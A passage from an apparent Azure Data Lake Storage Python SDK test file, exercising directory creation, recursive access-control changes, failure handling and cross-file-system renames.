directory_client.delete_directory(if_modified_since=prop['last_modified'])
@DataLakePreparer()
def test_create_sub_directory_and_delete_sub_directory(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# Arrange
directory_name = self._get_directory_reference()
metadata = {'hello': 'world', 'number': '42'}
# Create a directory first, to prepare for creating sub directory
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory(metadata=metadata)
# Create sub directory from the current directory
sub_directory_name = 'subdir'
sub_directory_created = directory_client.create_sub_directory(sub_directory_name)
# to make sure the sub directory was indeed created by get sub_directory properties from sub directory client
sub_directory_client = self.dsc.get_directory_client(self.file_system_name,
directory_name + '/' + sub_directory_name)
sub_properties = sub_directory_client.get_directory_properties()
# Assert
self.assertTrue(sub_directory_created)
self.assertTrue(sub_properties)
# Act
directory_client.delete_sub_directory(sub_directory_name)
with self.assertRaises(ResourceNotFoundError):
sub_directory_client.get_directory_properties()
@DataLakePreparer()
def test_set_access_control(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
metadata = {'hello': 'world', 'number': '42'}
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory(metadata=metadata)
response = directory_client.set_access_control(permissions='0777')
# Assert
self.assertIsNotNone(response)
@DataLakePreparer()
def test_set_access_control_with_acl(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
metadata = {'hello': 'world', 'number': '42'}
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory(metadata=metadata)
acl = 'user::rwx,group::r-x,other::rwx'
directory_client.set_access_control(acl=acl)
access_control = directory_client.get_access_control()
# Assert
self.assertIsNotNone(access_control)
self.assertEqual(acl, access_control['acl'])
@DataLakePreparer()
def test_set_access_control_if_none_modified(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
resp = directory_client.create_directory()
response = directory_client.set_access_control(permissions='0777', etag=resp['etag'],
match_condition=MatchConditions.IfNotModified)
# Assert
self.assertIsNotNone(response)
@DataLakePreparer()
def test_get_access_control(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
metadata = {'hello': 'world', 'number': '42'}
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory(metadata=metadata, permissions='0777')
# Act
response = directory_client.get_access_control()
# Assert
self.assertIsNotNone(response)
@DataLakePreparer()
def test_get_access_control_with_match_conditions(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
resp = directory_client.create_directory(permissions='0777', umask='0000')
# Act
response = directory_client.get_access_control(etag=resp['etag'], match_condition=MatchConditions.IfNotModified)
# Assert
self.assertIsNotNone(response)
self.assertEqual(response['permissions'], 'rwxrwxrwx')
@DataLakePreparer()
def test_set_access_control_recursive(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
acl = 'user::rwx,group::r-x,other::rwx'
summary = directory_client.set_access_control_recursive(acl=acl)
# Assert
# +1 as the dir itself was also included
self.assertEqual(summary.counters.directories_successful, num_sub_dirs + 1)
self.assertEqual(summary.counters.files_successful, num_sub_dirs * num_file_per_sub_dir)
self.assertEqual(summary.counters.failure_count, 0)
self.assertIsNone(summary.continuation)
access_control = directory_client.get_access_control()
self.assertIsNotNone(access_control)
self.assertEqual(acl, access_control['acl'])
@DataLakePreparer()
def test_set_access_control_recursive_throws_exception_containing_continuation_token(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
response_list = list()
def callback(response):
response_list.append(response)
if len(response_list) == 2:
raise ServiceRequestError("network problem")
acl = 'user::rwx,group::r-x,other::rwx'
with self.assertRaises(AzureError) as acl_error:
directory_client.set_access_control_recursive(acl=acl, batch_size=2, max_batches=2,
raw_response_hook=callback, retry_total=0)
self.assertIsNotNone(acl_error.exception.continuation_token)
self.assertEqual(acl_error.exception.message, "network problem")
self.assertIsInstance(acl_error.exception, ServiceRequestError)
@DataLakePreparer()
def test_set_access_control_recursive_in_batches(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
acl = 'user::rwx,group::r-x,other::rwx'
summary = directory_client.set_access_control_recursive(acl=acl, batch_size=2)
# Assert
# +1 as the dir itself was also included
self.assertEqual(summary.counters.directories_successful, num_sub_dirs + 1)
self.assertEqual(summary.counters.files_successful, num_sub_dirs * num_file_per_sub_dir)
self.assertEqual(summary.counters.failure_count, 0)
self.assertIsNone(summary.continuation)
access_control = directory_client.get_access_control()
self.assertIsNotNone(access_control)
self.assertEqual(acl, access_control['acl'])
@DataLakePreparer()
def test_set_access_control_recursive_in_batches_with_progress_callback(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
acl = 'user::rwx,group::r-x,other::rwx'
running_tally = AccessControlChangeCounters(0, 0, 0)
last_response = AccessControlChangeResult(None, "")
def progress_callback(resp):
running_tally.directories_successful += resp.batch_counters.directories_successful
running_tally.files_successful += resp.batch_counters.files_successful
running_tally.failure_count += resp.batch_counters.failure_count
last_response.counters = resp.aggregate_counters
summary = directory_client.set_access_control_recursive(acl=acl, progress_hook=progress_callback,
batch_size=2)
# Assert
self.assertEqual(summary.counters.directories_successful,
num_sub_dirs + 1) # +1 as the dir itself was also included
self.assertEqual(summary.counters.files_successful, num_sub_dirs * num_file_per_sub_dir)
self.assertEqual(summary.counters.failure_count, 0)
self.assertIsNone(summary.continuation)
self.assertEqual(summary.counters.directories_successful, running_tally.directories_successful)
self.assertEqual(summary.counters.files_successful, running_tally.files_successful)
self.assertEqual(summary.counters.failure_count, running_tally.failure_count)
self.assertEqual(summary.counters.directories_successful, last_response.counters.directories_successful)
self.assertEqual(summary.counters.files_successful, last_response.counters.files_successful)
self.assertEqual(summary.counters.failure_count, last_response.counters.failure_count)
access_control = directory_client.get_access_control()
self.assertIsNotNone(access_control)
self.assertEqual(acl, access_control['acl'])
@DataLakePreparer()
def test_set_access_control_recursive_with_failures(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
if not self.is_playback():
return
root_directory_client = self.dsc.get_file_system_client(self.file_system_name)._get_root_directory_client()
root_directory_client.set_access_control(acl="user::--x,group::--x,other::--x")
# Using an AAD identity, create a directory to put files under that
directory_name = self._get_directory_reference()
token_credential = self.generate_oauth_token()
directory_client = DataLakeDirectoryClient(self.dsc.url, self.file_system_name, directory_name,
credential=token_credential)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
# Create a file as super user
self.dsc.get_directory_client(self.file_system_name, directory_name).get_file_client("cannottouchthis") \
.create_file()
acl = 'user::rwx,group::r-x,other::rwx'
running_tally = AccessControlChangeCounters(0, 0, 0)
failed_entries = []
def progress_callback(resp):
running_tally.directories_successful += resp.batch_counters.directories_successful
running_tally.files_successful += resp.batch_counters.files_successful
running_tally.failure_count += resp.batch_counters.failure_count
failed_entries.append(resp.batch_failures)
summary = directory_client.set_access_control_recursive(acl=acl, progress_hook=progress_callback,
batch_size=2)
# Assert
self.assertEqual(summary.counters.failure_count, 1)
self.assertEqual(summary.counters.directories_successful, running_tally.directories_successful)
self.assertEqual(summary.counters.files_successful, running_tally.files_successful)
self.assertEqual(summary.counters.failure_count, running_tally.failure_count)
self.assertEqual(len(failed_entries), 1)
@DataLakePreparer()
def test_set_access_control_recursive_stop_on_failures(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
if not self.is_playback():
return
root_directory_client = self.dsc.get_file_system_client(self.file_system_name)._get_root_directory_client()
root_directory_client.set_access_control(acl="user::--x,group::--x,other::--x")
# Using an AAD identity, create a directory to put files under that
directory_name = self._get_directory_reference()
token_credential = self.generate_oauth_token()
directory_client = DataLakeDirectoryClient(self.dsc.url, self.file_system_name, directory_name,
credential=token_credential)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
# Create a file as super user
self.dsc.get_directory_client(self.file_system_name, directory_name).get_file_client("cannottouchthis") \
.create_file()
acl = 'user::rwx,group::r-x,other::rwx'
running_tally = AccessControlChangeCounters(0, 0, 0)
failed_entries = []
def progress_callback(resp):
running_tally.directories_successful += resp.batch_counters.directories_successful
running_tally.files_successful += resp.batch_counters.files_successful
running_tally.failure_count += resp.batch_counters.failure_count
if resp.batch_failures:
failed_entries.extend(resp.batch_failures)
summary = directory_client.set_access_control_recursive(acl=acl, progress_hook=progress_callback,
batch_size=6)
# Assert
self.assertEqual(summary.counters.failure_count, 1)
self.assertEqual(summary.counters.directories_successful, running_tally.directories_successful)
self.assertEqual(summary.counters.files_successful, running_tally.files_successful)
self.assertEqual(summary.counters.failure_count, running_tally.failure_count)
self.assertEqual(len(failed_entries), 1)
@DataLakePreparer()
def test_set_access_control_recursive_continue_on_failures(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
if not self.is_playback():
return
root_directory_client = self.dsc.get_file_system_client(self.file_system_name)._get_root_directory_client()
root_directory_client.set_access_control(acl="user::--x,group::--x,other::--x")
# Using an AAD identity, create a directory to put files under that
directory_name = self._get_directory_reference()
token_credential = self.generate_oauth_token()
directory_client = DataLakeDirectoryClient(self.dsc.url, self.file_system_name, directory_name,
credential=token_credential)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
# Create a file as super user
self.dsc.get_directory_client(self.file_system_name, directory_name).get_file_client("cannottouchthis") \
.create_file()
self.dsc.get_directory_client(self.file_system_name, directory_name).get_sub_directory_client("cannottouchthisdir") \
.create_directory()
acl = 'user::rwx,group::r-x,other::rwx'
running_tally = AccessControlChangeCounters(0, 0, 0)
failed_entries = []
def progress_callback(resp):
running_tally.directories_successful += resp.batch_counters.directories_successful
running_tally.files_successful += resp.batch_counters.files_successful
running_tally.failure_count += resp.batch_counters.failure_count
if resp.batch_failures:
failed_entries.extend(resp.batch_failures)
# set acl for all directories
summary = directory_client.set_access_control_recursive(acl=acl, progress_hook=progress_callback,
batch_size=6,
continue_on_failure=True)
# Assert
self.assertEqual(summary.counters.failure_count, 2)
self.assertEqual(summary.counters.directories_successful, running_tally.directories_successful)
self.assertEqual(summary.counters.files_successful, running_tally.files_successful)
self.assertEqual(summary.counters.failure_count, running_tally.failure_count)
self.assertEqual(len(failed_entries), 2)
self.assertIsNone(summary.continuation)
# reset the counter, set acl for part of the directories
running_tally = AccessControlChangeCounters(0, 0, 0)
failed_entries = []
summary2 = directory_client.set_access_control_recursive(acl=acl, progress_hook=progress_callback,
batch_size=6, max_batches=3,
continue_on_failure=True)
self.assertEqual(summary2.counters.failure_count, 2)
self.assertEqual(summary2.counters.directories_successful, running_tally.directories_successful)
self.assertEqual(summary2.counters.files_successful, running_tally.files_successful)
self.assertEqual(summary2.counters.failure_count, running_tally.failure_count)
self.assertEqual(len(failed_entries), 2)
self.assertIsNotNone(summary2.continuation)
@DataLakePreparer()
def test_set_access_control_recursive_in_batches_with_explicit_iteration(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
acl = 'user::rwx,group::r-x,other::rwx'
running_tally = AccessControlChangeCounters(0, 0, 0)
result = AccessControlChangeResult(None, "")
iteration_count = 0
max_batches = 2
batch_size = 2
while result.continuation is not None:
result = directory_client.set_access_control_recursive(acl=acl, batch_size=batch_size, max_batches=max_batches,
continuation=result.continuation)
running_tally.directories_successful += result.counters.directories_successful
running_tally.files_successful += result.counters.files_successful
running_tally.failure_count += result.counters.failure_count
iteration_count += 1
# Assert
self.assertEqual(running_tally.directories_successful,
num_sub_dirs + 1) # +1 as the dir itself was also included
self.assertEqual(running_tally.files_successful, num_sub_dirs * num_file_per_sub_dir)
self.assertEqual(running_tally.failure_count, 0)
access_control = directory_client.get_access_control()
self.assertIsNotNone(access_control)
self.assertEqual(acl, access_control['acl'])
@DataLakePreparer()
def test_update_access_control_recursive(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
acl = 'user::rwx,group::r-x,other::rwx'
summary = directory_client.update_access_control_recursive(acl=acl)
# Assert
self.assertEqual(summary.counters.directories_successful,
num_sub_dirs + 1) # +1 as the dir itself was also included
self.assertEqual(summary.counters.files_successful, num_sub_dirs * num_file_per_sub_dir)
self.assertEqual(summary.counters.failure_count, 0)
access_control = directory_client.get_access_control()
self.assertIsNotNone(access_control)
self.assertEqual(acl, access_control['acl'])
@DataLakePreparer()
def test_update_access_control_recursive_in_batches(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
acl = 'user::rwx,group::r-x,other::rwx'
summary = directory_client.update_access_control_recursive(acl=acl, batch_size=2)
# Assert
self.assertEqual(summary.counters.directories_successful,
num_sub_dirs + 1) # +1 as the dir itself was also included
self.assertEqual(summary.counters.files_successful, num_sub_dirs * num_file_per_sub_dir)
self.assertEqual(summary.counters.failure_count, 0)
access_control = directory_client.get_access_control()
self.assertIsNotNone(access_control)
self.assertEqual(acl, access_control['acl'])
@DataLakePreparer()
def test_update_access_control_recursive_in_batches_with_progress_callback(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
acl = 'user::rwx,group::r-x,other::rwx'
running_tally = AccessControlChangeCounters(0, 0, 0)
last_response = AccessControlChangeResult(None, "")
def progress_callback(resp):
running_tally.directories_successful += resp.batch_counters.directories_successful
running_tally.files_successful += resp.batch_counters.files_successful
running_tally.failure_count += resp.batch_counters.failure_count
last_response.counters = resp.aggregate_counters
summary = directory_client.update_access_control_recursive(acl=acl, progress_hook=progress_callback,
batch_size=2)
# Assert
self.assertEqual(summary.counters.directories_successful,
num_sub_dirs + 1) # +1 as the dir itself was also included
self.assertEqual(summary.counters.files_successful, num_sub_dirs * num_file_per_sub_dir)
self.assertEqual(summary.counters.failure_count, 0)
self.assertIsNone(summary.continuation)
self.assertEqual(summary.counters.directories_successful, running_tally.directories_successful)
self.assertEqual(summary.counters.files_successful, running_tally.files_successful)
self.assertEqual(summary.counters.failure_count, running_tally.failure_count)
self.assertEqual(summary.counters.directories_successful, last_response.counters.directories_successful)
self.assertEqual(summary.counters.files_successful, last_response.counters.files_successful)
self.assertEqual(summary.counters.failure_count, last_response.counters.failure_count)
access_control = directory_client.get_access_control()
self.assertIsNotNone(access_control)
self.assertEqual(acl, access_control['acl'])
@DataLakePreparer()
def test_update_access_control_recursive_with_failures(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
if not self.is_playback():
return
root_directory_client = self.dsc.get_file_system_client(self.file_system_name)._get_root_directory_client()
root_directory_client.set_access_control(acl="user::--x,group::--x,other::--x")
# Using an AAD identity, create a directory to put files under that
directory_name = self._get_directory_reference()
token_credential = self.generate_oauth_token()
directory_client = DataLakeDirectoryClient(self.dsc.url, self.file_system_name, directory_name,
credential=token_credential)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
# Create a file as super user
self.dsc.get_directory_client(self.file_system_name, directory_name).get_file_client("cannottouchthis") \
.create_file()
acl = 'user::rwx,group::r-x,other::rwx'
running_tally = AccessControlChangeCounters(0, 0, 0)
failed_entries = []
def progress_callback(resp):
running_tally.directories_successful += resp.batch_counters.directories_successful
running_tally.files_successful += resp.batch_counters.files_successful
running_tally.failure_count += resp.batch_counters.failure_count
failed_entries.append(resp.batch_failures)
summary = directory_client.update_access_control_recursive(acl=acl, progress_hook=progress_callback,
batch_size=2)
# Assert
self.assertEqual(summary.counters.failure_count, 1)
self.assertEqual(summary.counters.directories_successful, running_tally.directories_successful)
self.assertEqual(summary.counters.files_successful, running_tally.files_successful)
self.assertEqual(summary.counters.failure_count, running_tally.failure_count)
self.assertEqual(len(failed_entries), 1)
@DataLakePreparer()
def test_remove_access_control_recursive(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
summary = directory_client.remove_access_control_recursive(acl=REMOVE_ACL)
# Assert
self.assertEqual(summary.counters.directories_successful,
num_sub_dirs + 1) # +1 as the dir itself was also included
self.assertEqual(summary.counters.files_successful, num_sub_dirs * num_file_per_sub_dir)
self.assertEqual(summary.counters.failure_count, 0)
@DataLakePreparer()
def test_remove_access_control_recursive_in_batches(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
summary = directory_client.remove_access_control_recursive(acl=REMOVE_ACL, batch_size=2)
# Assert
self.assertEqual(summary.counters.directories_successful,
num_sub_dirs + 1) # +1 as the dir itself was also included
self.assertEqual(summary.counters.files_successful, num_sub_dirs * num_file_per_sub_dir)
self.assertEqual(summary.counters.failure_count, 0)
@DataLakePreparer()
def test_remove_access_control_recursive_in_batches_with_progress_callback(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
running_tally = AccessControlChangeCounters(0, 0, 0)
last_response = AccessControlChangeResult(None, "")
def progress_callback(resp):
running_tally.directories_successful += resp.batch_counters.directories_successful
running_tally.files_successful += resp.batch_counters.files_successful
running_tally.failure_count += resp.batch_counters.failure_count
last_response.counters = resp.aggregate_counters
summary = directory_client.remove_access_control_recursive(acl=REMOVE_ACL, progress_hook=progress_callback,
batch_size=2)
# Assert
self.assertEqual(summary.counters.directories_successful,
num_sub_dirs + 1) # +1 as the dir itself was also included
self.assertEqual(summary.counters.files_successful, num_sub_dirs * num_file_per_sub_dir)
self.assertEqual(summary.counters.failure_count, 0)
self.assertEqual(summary.counters.directories_successful, running_tally.directories_successful)
self.assertEqual(summary.counters.files_successful, running_tally.files_successful)
self.assertEqual(summary.counters.failure_count, running_tally.failure_count)
self.assertEqual(summary.counters.directories_successful, last_response.counters.directories_successful)
self.assertEqual(summary.counters.files_successful, last_response.counters.files_successful)
self.assertEqual(summary.counters.failure_count, last_response.counters.failure_count)
@DataLakePreparer()
def test_remove_access_control_recursive_with_failures(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
if not self.is_playback():
return
root_directory_client = self.dsc.get_file_system_client(self.file_system_name)._get_root_directory_client()
root_directory_client.set_access_control(acl="user::--x,group::--x,other::--x")
# Using an AAD identity, create a directory to put files under that
directory_name = self._get_directory_reference()
token_credential = self.generate_oauth_token()
directory_client = DataLakeDirectoryClient(self.dsc.url, self.file_system_name, directory_name,
credential=token_credential)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
# Create a file as super user
self.dsc.get_directory_client(self.file_system_name, directory_name).get_file_client("cannottouchthis") \
.create_file()
running_tally = AccessControlChangeCounters(0, 0, 0)
failed_entries = []
def progress_callback(resp):
running_tally.directories_successful += resp.batch_counters.directories_successful
running_tally.files_successful += resp.batch_counters.files_successful
running_tally.failure_count += resp.batch_counters.failure_count
failed_entries.append(resp.batch_failures)
summary = directory_client.remove_access_control_recursive(acl=REMOVE_ACL, progress_hook=progress_callback,
batch_size=2)
# Assert
self.assertEqual(summary.counters.failure_count, 1)
self.assertEqual(summary.counters.directories_successful, running_tally.directories_successful)
self.assertEqual(summary.counters.files_successful, running_tally.files_successful)
self.assertEqual(summary.counters.failure_count, running_tally.failure_count)
self.assertEqual(len(failed_entries), 1)
@DataLakePreparer()
def test_rename_from(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
content_settings = ContentSettings(
content_language='spanish',
content_disposition='inline')
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
new_name = "newname"
new_directory_client = self.dsc.get_directory_client(self.file_system_name, new_name)
new_directory_client._rename_path('/' + self.file_system_name + '/' + directory_name,
content_settings=content_settings)
properties = new_directory_client.get_directory_properties()
self.assertIsNotNone(properties)
self.assertIsNone(properties.get('content_settings'))
@pytest.mark.skip(reason="Investigate why renaming from shorter path to longer path does not work")
@DataLakePreparer()
def test_rename_from_a_shorter_directory_to_longer_directory(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
self._create_directory_and_get_directory_client(directory_name="old")
new_name = "newname"
new_directory_client = self._create_directory_and_get_directory_client(directory_name=new_name)
new_directory_client = new_directory_client.create_sub_directory("newsub")
new_directory_client._rename_path('/' + self.file_system_name + '/' + directory_name)
properties = new_directory_client.get_directory_properties()
self.assertIsNotNone(properties)
@DataLakePreparer()
def test_rename_from_a_directory_in_another_file_system(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# create a file dir1 under filesystem1
old_file_system_name = self._get_directory_reference("oldfilesystem")
old_dir_name = "olddir"
old_client = self.dsc.get_file_system_client(old_file_system_name)
old_client.create_file_system()
old_client.create_directory(old_dir_name)
# create a dir2 under filesystem2
new_name = "newname"
new_directory_client = self._create_directory_and_get_directory_client(directory_name=new_name)
new_directory_client = new_directory_client.create_sub_directory("newsub")
# rename dir1 under filesystem1 to dir2 under filesystem2
new_directory_client._rename_path('/' + old_file_system_name + '/' + old_dir_name)
properties = new_directory_client.get_directory_properties()
self.assertIsNotNone(properties)
@DataLakePreparer()
def test_rename_from_an_unencoded_directory_in_another_file_system(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# create a directory under filesystem1
old_file_system_name = self._get_directory_reference("oldfilesystem")
old_dir_name = "old dir"
old_client = self.dsc.get_file_system_client(old_file_system_name)
old_client.create_file_system()
old_dir_client = old_client.create_directory(old_dir_name)
file_name = "oldfile"
old_dir_client.create_file(file_name)
# move the directory under filesystem2
new_name = "new name/sub dir"
new_file_system_name = self._get_directory_reference("newfilesystem")
new_file_system_client = self.dsc.get_file_system_client(new_file_system_name)
new_file_system_client.create_file_system()
new_file_system_client.create_directory(new_name)
# rename dir1 under filesystem1 to dir2 under filesystem2
new_directory_client = old_dir_client.rename_directory('/' + new_file_system_name + '/' + new_name)
properties = new_directory_client.get_directory_properties()
file_properties = new_directory_client.get_file_client(file_name).get_file_properties()
self.assertIsNotNone(properties)
self.assertIsNotNone(file_properties)
old_client.delete_file_system()
@DataLakePreparer()
def test_rename_to_an_existing_directory_in_another_file_system(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# create a file dir1 under filesystem1
destination_file_system_name = self._get_directory_reference("destfilesystem")
destination_dir_name = "destdir"
fs_client = self.dsc.get_file_system_client(destination_file_system_name)
fs_client.create_file_system()
destination_directory_client = fs_client.create_directory(destination_dir_name)
# create a dir2 under filesystem2
source_name = "source"
source_directory_client = self._create_directory_and_get_directory_client(directory_name=source_name)
source_directory_client = source_directory_client.create_sub_directory("subdir")
# rename dir2 under filesystem2 to dir1 under filesystem1
res = source_directory_client.rename_directory('/' + destination_file_system_name + '/' + destination_dir_name)
# the source directory has been renamed to destination directory, so it cannot be found
with self.assertRaises(HttpResponseError):
source_directory_client.get_directory_properties()
self.assertEqual(res.url, destination_directory_client.url)
@DataLakePreparer()
def test_rename_with_none_existing_destination_condition_and_source_unmodified_condition(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
non_existing_dir_name = "nonexistingdir"
# create a filesystem1
destination_file_system_name = self._get_directory_reference("destfilesystem")
fs_client = self.dsc.get_file_system_client(destination_file_system_name)
fs_client.create_file_system()
# create a dir2 under filesystem2
source_name = "source"
source_directory_client = self._create_directory_and_get_directory_client(directory_name=source_name)
source_directory_client = source_directory_client.create_sub_directory("subdir")
# rename dir2 under filesystem2 to a non existing directory under filesystem1,
# when dir1 does not exist and dir2 wasn't modified
etag = source_directory_client.get_directory_properties()['etag']
res = source_directory_client.rename_directory('/' + destination_file_system_name + '/' + non_existing_dir_name,
match_condition=MatchConditions.IfMissing,
source_etag=etag,
source_match_condition=MatchConditions.IfNotModified)
# the source directory has been renamed to destination directory, so it cannot be found
with self.assertRaises(HttpResponseError):
source_directory_client.get_directory_properties()
self.assertEqual(non_existing_dir_name, res.path_name)
@DataLakePreparer()
def test_rename_to_an_non_existing_directory_in_another_file_system(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# create a file dir1 under filesystem1
destination_file_system_name = self._get_directory_reference("destfilesystem")
non_existing_dir_name = "nonexistingdir"
fs_client = self.dsc.get_file_system_client(destination_file_system_name)
fs_client.create_file_system()
# create a dir2 under filesystem2
source_name = "source"
source_directory_client = self._create_directory_and_get_directory_client(directory_name=source_name)
source_directory_client = source_directory_client.create_sub_directory("subdir")
# rename dir2 under filesystem2 to dir1 under filesystem1
res = source_directory_client.rename_directory('/' + destination_file_system_name + '/' + non_existing_dir_name)
# the source directory has been renamed to destination directory, so it cannot be found
with self.assertRaises(HttpResponseError):
source_directory_client.get_directory_properties()
self.assertEqual(non_existing_dir_name, res.path_name)
@pytest.mark.skip(reason="Investigate why renaming non-empty directory doesn't work")
@DataLakePreparer()
def test_rename_directory_to_non_empty_directory(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
dir1 = self._create_directory_and_get_directory_client("dir1")
dir1.create_sub_directory("subdir")
dir2 = self._create_directory_and_get_directory_client("dir2")
dir2.rename_directory(dir1.file_system_name + '/' + dir1.path_name)
with self.assertRaises(HttpResponseError):
dir2.get_directory_properties()
@pytest.mark.live_test_only
@DataLakePreparer()
def test_rename_dir_with_file_system_sas(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
token = generate_file_system_sas(
self.dsc.account_name,
self.file_system_name,
self.dsc.credential.account_key,
FileSystemSasPermissions(write=True, read=True, delete=True),
datetime.utcnow() + timedelta(hours=1),
)
# read the created file which is under root directory
